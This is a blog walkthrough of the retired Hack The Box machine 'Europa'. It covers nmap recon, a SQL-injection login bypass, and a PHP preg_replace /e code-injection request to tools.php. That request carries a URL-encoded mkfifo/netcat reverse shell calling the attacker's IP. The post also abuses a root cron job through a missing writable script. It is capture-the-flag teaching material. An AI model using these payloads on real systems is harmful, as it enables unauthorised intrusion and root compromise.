Skip to main content

Hackthebox.eu - Retired - Europa


Hackthebox.eu - Retired - Europa


Recon


As always I start with a simple UP/Down scan on all TCP ports.
$ nmap -T4 -p- -oX ./nmapb.xml europa.htb


Then I convert that to HTML to make it pretty
xsltproc ./nmapb.xml -o ./nmapb.html



Ports 22, 80 and 443 open..

Looks like this box is going to be mostly web based

Let's run nmap again with the -A switch to run all scripts against these three ports

$ nmap -T4 -A -p22,80,443 -oX ./nmapf.xtml europa.htb

Then we will convert that output to HTML also
xsltproc ./nmapf.xml -o ./nmapf.html





Looks like we have an Ubuntu box running a fairly new version of OpenSSH on port 22 and Apache 2.4.18 on 80 and 443


Let's check out those Apache sites

Both are just the default Apache install page

Got a little bit more info from the certificate on 443


Europacorp.htb should be the box

I ran a bunch of scans at these two domains
Europa.htb
europacorp.htb

Tried Dirb and Dirbuster and didn't find anything…

Looking back at the nmap results I see this


Admin-portal.europacorp.htb

Also in the cert we found this email address

admin@europacorp.htb



Exploit





Woot we got a login page

Tried some generic SQLI here but didn't get anywhere in the browser. It wouldn't let me do anything with the email address




What about if we try it with burp to get around that silly data validation.


We got a redirection


We are in.



None of the links on the dashboard are real, they just link back to the dashboard.php.

However there is this tools section.

Which would let a user input an IP address,presumably the IP address of the OPENVPN server and the tool would generate a OpenVPN config file to connect up to the company VPN…

But as an attacker what do we have here?. A way to input some data and the server interacting with that data hopefully we can use this to get our foothold.

This is what the request looks like in burp



If we look at the code used in the generate we can see this hidden input



There is a field named pattern with /ip_address/ as the value

Since that is surrounded by / / 's it make me think there might be some regex involved in the the code that is generating the config

There is a fairly well know depreciated modifier in php preg_replace



Here is a blog about why this is depreciated.



If we can insert /e in the pattern field then whatever comes after it will be will be evaluated as a PHP expression….

So we can use our input to insert PHP code in our request..


So let's try to ping our VPN IP

So in php that would look like this

system('ping -c 10.10.14.42')

For this to work we are going to need to encode those spaces in our command

We can just put in a + sign for the spaces

So it would then look like 
system('ping+-c+10+10.10.14.42')

So first let's setup a listener on our 

sudo tcpdump -i tun0 -n icmp

So tcpdump on just interface tun0 and only showing ICMP

Here is what I ended up with for my request

pattern=%2Fchanged%2Fe&ipaddress=system('ping+-c+10+10.10.14.42')&text=changed


And my TCPDUMP


Ok so Proof of concept work there..

Let's try to get a shell

I tired a couple but finally had luck with a mkfifo shell

So it would start by looking like this

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Then of course we need to edit that for our VPN IP

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10 1234 >/tmp/f
Now we need ot  URL encode

I use this website to do it

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.42%205555%20%3E%2Ftmp%2Ff

Before we try to send this to the tools.php we need to setup our listener


$ nc -lnvp 5555

Here is my final request

pattern=%2Fchanged%2Fe&ipaddress=system('rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.42%205555%20%3E%2Ftmp%2Ff')&text=changed

Sent that to tools.php using burp annnnnnnnnddddddddd


We got a shell, we got a shell, we got a shell hey hey hey hey

1930S GIF



Poking around the system and we already can get the user flag

In the /home/john folder





I used wget to xfer linenum.sh to the europa box

I saw this in the output ( after I gave it execute rights)




Here is a job that runs every minute as root.. Coool

Lets see what it does

$ cat /var/www/cronjobs/clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

So it looks like it blanks out the access.log……

But then it calls a script in /var/www/cmd/
Named logcleared.sh

Lets see what is in that script


Nothing, it doesn't exist but it looks like we have right access to this folder so we can make one :)


So I made one with this line


cat /root/root.txt  >> /tmp/circusmonkey/root.txt

Copied it over using wget and my SimpleHTTPServer 

Waited a minute

The cat'd the file


Running Late Cut You Off GIF by Saturday Night Live


















Comments

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar...

Hack The Box - Retired - Laboratory

HackTheBox - Laboratory - Retired Starting off with a quick scan using threader6000 /opt/threader3000/threader6000.py 10.10.10.216 Ports 22,80,443 came back. Run nmap against these ports. nmap -p22,80,443 -sV -sC -T4 -Pn -oN 10.10.10.216 10.10.10.216 nmap -p22,80,443 -sV -sC -Pn -T4 -oN 10.10.10.216 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 17:43 EDT Nmap scan report for laboratory.htb (10.10.10.216) Host is up (0.060s latency). PORT    STATE SERVICE  VERSION 22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA) |   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA) |_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519) 80/tcp  open  http     Apache httpd 2.4.41 |_...

A collection of online Security CTF and Learning sites

 Hellbound Hackers    Embedded Security CTF Arizona Cyber Warfare Range Over The Wire - Bandit Pico CTF 2018 Hack The Box.eu Root Me: Challenges/Forensic RingZero CTF Vulnerable By Design - Vulnerable VMs Murder Mystery SQL Challenge Incident Response Challenge Authentication Lab Walkthroughs Defcon CTF Archives Matrix Holiday Hack Cyber Defenders | Blue Team and CTF Crypto Hack - learning Crypto Video Learning Zero to Hero Pentesting by The Cyber Mentor